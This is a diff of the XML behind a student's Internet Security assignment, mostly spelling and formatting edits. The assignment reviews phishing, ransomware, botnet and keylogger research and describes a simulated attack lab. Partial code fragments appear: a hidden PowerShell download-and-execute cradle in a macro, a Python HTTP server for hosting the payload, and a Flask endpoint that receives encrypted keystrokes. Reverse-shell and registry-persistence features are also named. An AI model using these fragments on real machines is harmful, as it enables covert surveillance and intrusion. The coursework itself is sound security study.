--- a/COS80013 - Internet Security/Projects/Assignment_1.docx
+++ b/COS80013 - Internet Security/Projects/Assignment_1.docx
@@ -4,6 +4,15 @@
   <w:body>
     <w:sdt>
       <w:sdtPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AU"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
         <w:id w:val="1916820585"/>
         <w:docPartObj>
           <w:docPartGallery w:val="Table of Contents"/>
@@ -12,16 +21,9 @@
       </w:sdtPr>
       <w:sdtEndPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:b/>
           <w:bCs/>
           <w:noProof/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-AU"/>
-          <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:sdtEndPr>
       <w:sdtContent>
@@ -1552,7 +1554,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t>Orebaugh and Allnutt (2022) went deeper into the structure of these kits. By analyzing code samples shared in underground forums, they found that many phishing kits include obfuscation techniques like base64 encoding, JavaScript masking, and user-agent filtering. These features make it harder for automated scanners and security researchers to detect or analyze the fake pages. The study also revealed that some kits included Telegram bots or encrypted email features to exfiltrate stolen credentials more discreetly. The reuse of open-source code means that even low-level attackers can launch convincing campaigns in minutes.</w:t>
+        <w:t xml:space="preserve">Orebaugh and Allnutt (2022) went deeper into the structure of these kits. By analyzing code samples shared in underground forums, they found that many phishing kits include obfuscation techniques like base64 encoding, JavaScript masking, and user-agent filtering. These features make it harder for automated scanners and security researchers to detect or </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>analyse</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the fake pages. The study also revealed that some kits included Telegram bots or encrypted email features to exfiltrate stolen credentials more discreetly. The reuse of open-source code means that even low-level attackers can launch convincing campaigns in minutes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1717,19 +1731,17 @@
         </w:rPr>
         <w:t xml:space="preserve">Lee and Mohammed (2022) focused on the technical side of RaaS payloads. Their analysis showed that modern ransomware is highly customizable. Affiliates can set the ransom amount, encryption speed, deadline timers, and even visual elements like desktop wallpapers and message boxes. Some payloads included features to detect whether the malware was running in a virtual machine or sandbox, allowing it to exit quietly before being </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>analyzed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>. They also observed that most RaaS platforms used a combination of AES and RSA encryption—ensuring that even if files were recovered, decryption would be nearly impossible without the attacker's private key.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>analyse</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>d. They also observed that most RaaS platforms used a combination of AES and RSA encryption—ensuring that even if files were recovered, decryption would be nearly impossible without the attacker's private key.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1819,7 +1831,31 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t>In conclusion, Ransomware-as-a-Service reflects a shift in how cybercrime is organized and delivered. It blends technical sophistication with accessibility, creating a dangerous ecosystem where powerful malware can be weaponized by anyone with enough cryptocurrency. The damage it causes is not only financial but reputational and operational. The best defense requires a combination of proactive threat intelligence, endpoint detection, and user training, alongside continued efforts to disrupt the infrastructure that supports this growing industry.</w:t>
+        <w:t>In conclusion, Ransomware-as-a-Service reflects a shift in how cybercrime is organi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ed and delivered. It blends technical sophistication with accessibility, creating a dangerous ecosystem where powerful malware can be weaponi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ed by anyone with enough cryptocurrency. The damage it causes is not only financial but reputational and operational. The best defense requires a combination of proactive threat intelligence, endpoint detection, and user training, alongside continued efforts to disrupt the infrastructure that supports this growing industry.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1872,7 +1908,19 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Singh, Khan, and Rao (2022) provided a comprehensive overview of how botnets have evolved over the past two decades. Early botnets were simple, often using Internet Relay Chat (IRC) channels to deliver commands. But modern botnets are much more advanced. They use encryption, peer-to-peer communication, and domain generation algorithms (DGAs) to make detection and shutdown difficult. The study highlighted real-world examples like Mirai, which infected over 600,000 IoT devices in 2016 and used them to overwhelm DNS services, affecting websites like Twitter and Netflix. The researchers emphasized that botnets have become modular and persistent, often containing functions like auto-update modules and plugins for additional attacks.</w:t>
+        <w:t>Singh, Khan, and Rao (2022) provided a comprehensive overview of how botnets have evolved over the past two decades. Early botnets were simple, often using Internet Relay Chat (IRC) channels to deliver commands. But modern botnets are much more advanced. They use encryption, peer-to-peer communication, and domain generation algorithms (DGAs) to make detection and shutdown difficult. The study highlighted real-world examples like Mirai, which infected over 600,000 IoT devices in 2016 and used them to overwhelm DNS services, affecting websites like Twitter and Netflix. The researchers emphasi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ed that botnets have become modular and persistent, often containing functions like auto-update modules and plugins for additional attacks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2002,7 +2050,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t>Keylogger-based malware is a type of spying tool designed to silently record a user’s keystrokes. These programs run in the background, capturing everything typed—including usernames, passwords, emails, messages, and even private documents. Keyloggers are often used in the early stages of an attack to gather sensitive information that can be used for further exploitation or unauthorized access. Despite being simple in design, keyloggers remain highly effective, especially when paired with remote exfiltration techniques.</w:t>
+        <w:t>Keylogger-based malware is a type of spying tool designed to silently record a user’s keystrokes. These programs run in the background, capturing everything typed—including usernames, passwords, emails, messages, and even private documents. Keyloggers are often used in the early stages of an attack to gather sensitive information that can be used for further exploitation or unauthori</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ed access. Despite being simple in design, keyloggers remain highly effective, especially when paired with remote exfiltration techniques.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2028,7 +2088,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t>Looking at a broader range of threats, Bhardwaj and Goundar (2020) examined the role of keyloggers in large-scale spyware campaigns. They categorized keyloggers into three types: hardware-based (like USB sniffers), kernel-level (deep in the operating system), and user-space (software-level, like Python or Java). Their study focused on user-space keyloggers, noting that many use tricks like hiding logs in disguised files or injecting themselves into system processes like explorer.exe. They also explained how attackers use scheduled tasks, startup folders, or registry keys to keep keyloggers running persistently, even after a reboot.</w:t>
+        <w:t>Looking at a broader range of threats, Bhardwaj and Goundar (2020) examined the role of keyloggers in large-scale spyware campaigns. They categori</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ed keyloggers into three types: hardware-based (like USB sniffers), kernel-level (deep in the operating system), and user-space (software-level, like Python or Java). Their study focused on user-space keyloggers, noting that many use tricks like hiding logs in disguised files or injecting themselves into system processes like explorer.exe. They also explained how attackers use scheduled tasks, startup folders, or registry keys to keep keyloggers running persistently, even after a reboot.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2207,6 +2279,19 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>https://github.com/athulck/Fileless-Malware/blob/main/SourceCode.cpp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -2222,11 +2307,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="50"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -2240,11 +2320,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="50"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -2258,11 +2333,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="50"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -2276,11 +2346,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="50"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -2314,34 +2379,25 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Features </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="51"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
+        <w:t>Features</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Encrypted HTTPS reverse shell</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="51"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -2355,30 +2411,19 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="51"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
         <w:t>Download-and-execute pattern that mimics macro behavior</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="51"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -2540,6 +2585,7 @@
         </w:rPr>
         <w:t xml:space="preserve">sudo python3 -m </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -2549,6 +2595,7 @@
         </w:rPr>
         <w:t>http.server</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -2892,6 +2939,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    Shell "powershell -nop -w hidden -c IEX (New-Object Net.WebClient</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -2954,7 +3002,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>6.</w:t>
       </w:r>
       <w:r>
@@ -2968,11 +3015,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="52"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -2986,11 +3028,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="52"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3004,11 +3041,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="52"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3022,11 +3054,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="52"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3057,29 +3084,25 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="53"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Simulated phishing vector adds realism.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="53"/>
-        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Simulated phishing vector </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>brings it close to real life cases.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3093,11 +3116,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="53"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3203,11 +3221,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="54"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3229,11 +3242,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="54"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3255,11 +3263,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="54"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3281,11 +3284,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="54"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3324,11 +3322,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="55"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3342,11 +3335,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="55"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3360,29 +3348,20 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="55"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Persistence via registry key (Windows startup)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="55"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3396,11 +3375,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="55"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
@@ -3447,14 +3421,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">On the victim side, a Python script captures every keystroke using the pynput library. Each captured key is timestamped and encrypted using AES encryption before being sent via POST </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>request to the Flask server. The script runs silently in the background and launches on every system boot by registering itself in the Windows registry.</w:t>
+        <w:t>On the victim side, a Python script captures every keystroke using the pynput library. Each captured key is timestamped and encrypted using AES encryption before being sent via POST request to the Flask server. The script runs silently in the background and launches on every system boot by registering itself in the Windows registry.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3692,26 +3659,34 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>@</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>app.route</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>('/log', methods=['POST'])</w:t>
       </w:r>
@@ -3720,40 +3695,52 @@
       <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">def </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>receive_</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>data</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>):</w:t>
       </w:r>
@@ -3762,40 +3749,52 @@
       <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">data = </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>request.get_</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
